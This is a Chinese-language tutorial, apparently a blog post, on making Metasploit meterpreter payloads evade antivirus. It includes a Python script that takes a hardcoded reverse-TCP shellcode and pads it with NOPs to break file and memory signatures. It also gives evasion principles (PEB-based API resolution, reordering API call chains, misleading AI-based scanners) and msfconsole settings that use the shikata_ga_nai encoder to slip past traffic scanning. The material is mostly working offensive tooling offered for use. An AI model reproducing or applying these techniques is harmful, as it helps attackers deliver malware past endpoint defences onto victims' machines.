首先说静态的文件特征码,直接把msf生成的shellcode加密一下就ok了,运行时再解密,随便加一轮异或啥的就ok了,可以用msf自带的编码器也可以自己写,但是加载到内存里就又会解码,变回原来的面目,并且前面加上的loader也会有loader的特征码,并且编码后熵值会增大。

内存特征码,因为我们的meterpreter运行后会解密shellcode,解密后的shellcode有特征,shellcode是地址无关的机器码,所以我们可以插入任何不影响正常逻辑的nop指令到每两行汇编代码之间,这样简单粗暴地绕过内存里的特征码识别,当然还可以进行汇编代码的等效替换,比如add eax,1sub eax,-1是等效的并且代码所占用的字节数是一样的,就可以等效替换,还可以把顺序无关的代码进行上下位置替换等等等等

以下python脚本自动插入不影响正常逻辑的nop指令
这样一来就也不用加密shellcode了,文件特征码和内存特征码都没了,以下python代码的大致逻辑就是把跳转到的目的指令处都加上独一无二的标号,然后把跳转指令改成跳转标号,再编译成机器码,这样可以省去修正控制流转移指令的地址。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
from capstone import *
from keystone import *

def assemble(code):
try:
ks = Ks(KS_ARCH_X86, KS_MODE_32)
encoding, count = ks.asm(code)
return [hex(i) for i in encoding]
except KsError as e:
print(e)
return -1
def byteoffset2index(offset):
temp=offset
a=0
for i in md.disasm(CODE, 0x0):
temp-=len(i.bytes)
a+=1
if temp==0:
return a
if __name__ == "__main__":
md = Cs(CS_ARCH_X86, CS_MODE_32)
controlflow=["jmp","jz","jnz","je","jne","call","jl","ja","loop","jecxz","jle","jge","jg","jp","jnl"]
registers=["eax","ebx","edx","ebp","esp","edi","esi"]
CODE = b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\x89\xe8\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x68\x7f\x00\x00\x01\x68\x02\x00\x11\x5c\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x67\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x68\x00\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\x0f\x85\x70\xff\xff\xff\xe9\x9b\xff\xff\xff\x01\xc3\x29\xc6\x75\xc1\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5"
asm=";".join([i.mnemonic+" "+i.op_str for i in md.disasm(CODE, 0x0)])
asmarray=asm.split(";")
tags=[]
for i in range(0,len(asmarray)):
for mnemonic in controlflow:
if (mnemonic in asmarray[i]):
tags.append(i)
mask=[]
for i in range(0,len(tags)):
for reg in registers:
if (reg in asmarray[tags[i]]):
mask.append(tags[i])
[tags.remove(i) for i in mask]
tagins=[asmarray[i] for i in tags]
revision=[]
for i in range(0,len(tagins)):
b=tagins[i][tagins[i].index("0x"):]
n=byteoffset2index(int(b,16))
revision.append(n)
revision_unique=list(set(revision))
for i in range(0,len(revision_unique)):
asmarray[revision_unique[i]]="a"+str(revision_unique[i])+": "+asmarray[revision_unique[i]]
tagins=[asmarray[i] for i in tags]
for i in range(0,len(tags)):
asmarray[tags[i]]=tagins[i][:tagins[i].index("0x")]+"a"+str(revision[i])
obfuscation="nop"
code=obfuscation+";"+(";"+obfuscation+";").join(asmarray)
print("unsigned char buf[]="+str(assemble(code)).replace("\'","").replace("[","{").replace("]","}")+";")

然后用c写个shellcode加载器运行就行了,这样就可以干掉国内大部分杀软
汇编和特征码层面的免杀还可以改编译器的配置,比如你修改工程属性里的优化等选项可以大幅度的更改源代码对应的汇编代码,从而抹掉一些特征码

还有一些编写的原则就是
1.多引入无关逻辑,无关逻辑的引入一方面是为了把shellcode执行隐藏到更深的分支,另一方面是误导一些智障AI杀软
2.不常见的写法,比如跳到shellcode中执行的时候callpush addr;ret代替,等等
3.显式链接显式调用,不要让杀软一下就知道程序加载了什么dll调用了什么函数,可以通过shellcode中惯用的手法,通过PEB来获取到函数地址。
4.函数调用顺序,一些特定的恶意操作需要几个api按顺序的调用链来完成,一些杀软用了卷积神经网络模型,卷积保留了空间位置关系,不是AI的杀软也可能有一些规则匹配多个相继的函数调用啥的,所以可以在不影响正常逻辑的前提下适当改变函数调用顺序或者重写一些api,比如我们写个shellcode加载器,常规操作就是调用VirtualAllocmemcpy,然后再跳进申请的空间,这两个api的相继调用就完成了我们需要的特定操作,当然也是一个明显的相继调用形式的特征,我们把memcpy用一个循环来替代,前后分别用杀软扫描对比,就会发现神奇的效果。
5.除此之外,尽量减少人工痕迹。
等等等等
效果于2019/03/03

最后的工程文件就不贴出来了

流量免杀的话就可以直接拿来用了

1
2
set EnableStageEncoding true
set StageEncoder x86/shikata_ga_nai

用编码器就ok了,目前国内用户用的多的的杀软里面目测只有windows defender进行了流量扫描,测试这个编码可以绕过,其他的编码等级都太低,编码成功率太低,只有这个shikata_ga_nairankexcellent

还有就是佛性一点,毕竟杀软也挺佛性的,杀软宁可错杀一千,不肯放过一个,所以说有的时候我们不是在绕杀软的查杀能力,而是在绕杀软的误报能力(此处手动滑稽),总之能改的地方能变换的地方就瞎几把改改试试,瞎几把变换试试,多测试,多猜测杀软的内部逻辑,多验证,实践是检验能不能绕过杀软的唯一标准。
持续更新,继续踩坑